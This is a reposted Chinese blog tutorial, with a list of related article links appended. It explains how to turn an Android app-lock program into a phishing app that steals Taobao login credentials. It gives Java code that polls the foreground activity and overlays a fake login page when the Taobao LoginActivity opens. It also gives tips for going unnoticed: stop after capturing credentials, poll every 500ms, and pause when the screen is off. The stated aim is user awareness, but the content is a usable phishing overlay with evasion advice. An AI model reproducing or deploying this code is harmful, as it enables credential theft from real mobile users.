导读:文本介绍一种钓鱼应用,讲述如何骗取用户的用户名和密码,无须root

这个话题是继续android安全问题(二) 程序锁延伸的

之前我已经展示了如何制作程序锁。当打开指定应用的时候,弹出一个密码页面。

程序锁的话题虽然是和安全相关,但是这应该属于防范的范围,如果被人恶意利用,那么后果……

这期我来揭示一下一种钓鱼程序的原理,希望广大用户不要上当受骗,最主要的是:希望大家意识到安全问

之前我用定时扫描activity的方法来检查打开的页面是不是我们所需要的页面

ComponentName topActivity = mActivityManager.getRunningTasks(1).get(0).topActivity;

如何用于钓鱼呢?比如我打开了淘宝,然后想登录,查看一下我淘宝,这时候会打开下面这个页面

从log中我们能得到其包和类的信息

log 写道

10-17 10:02:14.698: I/ActivityManager(246): Displayed com.taobao.taobao/com.taobao.tao.LoginActivity: +305ms

恩,这就好办了,下面我只需改三处,程序锁这个应用就会变成调用应用

第一个修改很简单,修改我们监听的包名和类名即可

String testPackageName = "com.taobao.taobao";
String testClassName = "com.taobao.tao.LoginActivity";

完整代码

public class LockTask extends TimerTask {public static final String TAG = "LockTask";private Context mContext;String testPackageName = "com.taobao.taobao";String testClassName = "com.taobao.tao.LoginActivity";private ActivityManager mActivityManager;public LockTask(Context context) {mContext = context;mActivityManager = (ActivityManager) context.getSystemService("activity");}@Overridepublic void run() {ComponentName topActivity = mActivityManager.getRunningTasks(1).get(0).topActivity;String packageName = topActivity.getPackageName();String className = topActivity.getClassName();Log.v(TAG, "packageName" + packageName);Log.v(TAG, "className" + className);if (testPackageName.equals(packageName)&& testClassName.equals(className)) {Intent intent = new Intent();intent.setClassName("com.example.locktest", "com.example.locktest.PasswordActivity");intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);mContext.startActivity(intent);}}
}

第二个修改有些技术含量,可能会需要一个专业的美工,来仿造一个淘宝的登录页面,就如上图所示的那样

最后一个修改,当病毒获取了用户名和密码之后,就不要再继续监听了,不然次数多了肯定会被发现

为了尽量不让用户察觉,可以把频率调高一些,比如500ms检查一次,这样用户就很难察觉了

测试项目完整源码见附件,代码是以android4.0为基础写的(当然,我的钓鱼页面是简陋的,只是用于演示)

无论是程序锁还是钓鱼程序,他们可能都担心耗电问题,因为耗电过多也会引起用户的注意

我们可以降低检查频率(当然,钓鱼程序是不会这么干的)

我们可以监控屏幕状态,当屏幕关闭的时候,我们可以停止监听,这时候也没有必要监听,当点亮的时候我们再监听

如何监听屏幕状态?

我们需要监听下面两个action

Intent.ACTION_SCREEN_OFF

Intent.ACTION_SCREEN_ON

还有一个要求,就是要动态注册才可以,不能在manifest中注册

其余的事情大家就自己实现吧

转载于:https://www.cnblogs.com/zhujiabin/p/4273899.html

Android安全问题 钓鱼程序相关推荐

  1. android安全问题(八)伪造短信(利用原生android4.0漏洞)

    导读:本文利用android4.0的一个原生漏洞来伪造短信.无须声明任何权限即可伪造发送方为任何号码的短信给用户. android4.0发布已经是很久很久很久很久以前的事情了,这个漏洞早就报了出来,之 ...

  2. 最好用的Android黑客应用程序和工具

    本文讲的是最好用的Android黑客应用程序和工具,黑客技术,曾被认为是专家的专有领域,但随着技术的崛起和移动安全领域的进步,黑客技术已经变得越来越普遍.随着人们越来越依赖于智能手机和其它的便携式设备 ...

  3. java计算机毕业设计基于安卓Android/微信小程序的智能停车场管理系统APP

    项目介绍 随着计算机的普及,国际上智能停车场管理系统前景良好,网上用户停车的出现,证明了智能停车场管理系统具有良好的前景.在当今世界之中,随着科学技术的不断发展和计算机越来越普及,运用计算机对系统进行 ...

  4. Android开发之程序猿必需要懂得Android的重要设计理念2(5.20更新版)

    上篇文章介绍了Android开发的设计理念的一部分,并没有得到博友们的多大认可,仅仅看到了一位博友在以下留言期待下一篇文章的发表,为了这小小的唯一支持.我决定继续把后面的8个要点介绍一下,自己也潜心反 ...

  5. Android实用应用程序源码

    andriod闹钟源代码 http://www.apkbus.com/android-20974-1-1.html android源码分享之指南针程序 http://www.apkbus.com/an ...

  6. android系统应用程序,Android系统应用程序基本概念解读

    经常关注我们51CTO的朋友们应该知道,在以前的文章中我们对Android这一手机系统有一个详细的跟踪介绍,方便大家学习应用这一新的功能强大的开源手机系统,比如对Android源码的编译的解析的解析等 ...

  7. Android安全问题 抢先接收广播 - 内因篇之广播接收器注册流程

    导读:本文说明系统是如何注册动态广播以及静态广播,这里主要注意其注册的顺序 这篇文章主要是针对我前两篇文章 android安全问题  抢先开机启动 - 结果篇 android安全问题  抢先拦截短信 ...

  8. 博文视点大讲堂35期-It's Android Time:程序员创富有道! 圆满结束

    博文视点大讲堂35期 It's Android Time:程序员创富有道! 暨<Google Android创赢路线与产品开发实战>读者见面会圆满结束 PPT下载 面向移动终端的应用开发作 ...

  9. android unity 关闭应用_在后台运行的Android Unity应用程序

    我有一个在Android上运行的Unity应用程序.它也会在应用程序放入后台时继续运行.它不使用服务在后台运行.相反,这个应用程序会创建一个新线程,并且该线程在应用程序处于后台时继续运行.在后台运行的 ...

最新文章

  1. 测试我自己的系统是大端还是小端
  2. 数据库-事务-事务的特征
  3. ehcache 清除缓存_如何设计一个本地缓存
  4. NOIP1996复赛 普及组 第二题 python
  5. git pull 分支问题
  6. hive动态分区shell_hive-shell批量操作分区文件
  7. 人生苦短我用python梗_为什么说人生苦短,我用Python?
  8. linux关闭urlhelper服务,ASP.NET MVC UrlHelper.GenerateUrl异常:“无法使用导航..退出顶部目录”...
  9. 修改金仓数据库KingbaseES端口
  10. 计算机rec代表什么意思,recovery是什么意思,怎么进入recovery
  11. Blender基础建模 | 大帅老猿threejs特训
  12. 反相畴的基础知识和一篇论文
  13. 传奇单机架设图文教程
  14. wpf 响应键盘按键
  15. Remote NDIS (RNDIS)
  16. SSM整合(基于配置类整合
  17. 大数据方向学习系列——hadoop——hdfs学习
  18. background-size:cover | contain;
  19. 【QT开发笔记-基础篇】| 第五章 绘图QPainter | 5.11 路径
  20. 中职计算机高考提分技巧,高考前提分技巧:熟悉高考电脑阅卷流程 让你多拿20分...

热门文章

  1. idea的setting界面怎么进_Mac版YY语音进入频道失败怎么破?
  2. php log 行号 debug_backtrace,PHP debug_backtrace() 函数生成 backtrace(回溯跟踪)
  3. dbeaver导出excel文件_vue将数据导出为excel文件就是如此简单
  4. android怎么引用ttf字体,android 自定义字体ttf使用的几种方法
  5. Axure设计设备管理系统后台系统界面
  6. mysql中 视图的优缺点_SQL中使用视图的优点和缺点是什么
  7. mysql怎么查主键是否重复数据库_数据库插入前判断主键重复与否的方法
  8. cobbler命令_使用Cobbler批量部署Linux和Windows:Windows系统批量安装(三)
  9. 工信部证书含金量_关于推荐考取BIM工程师、装配式工程师证书
  10. terminal看服务器性能,终端服务服务器性能评估优化问题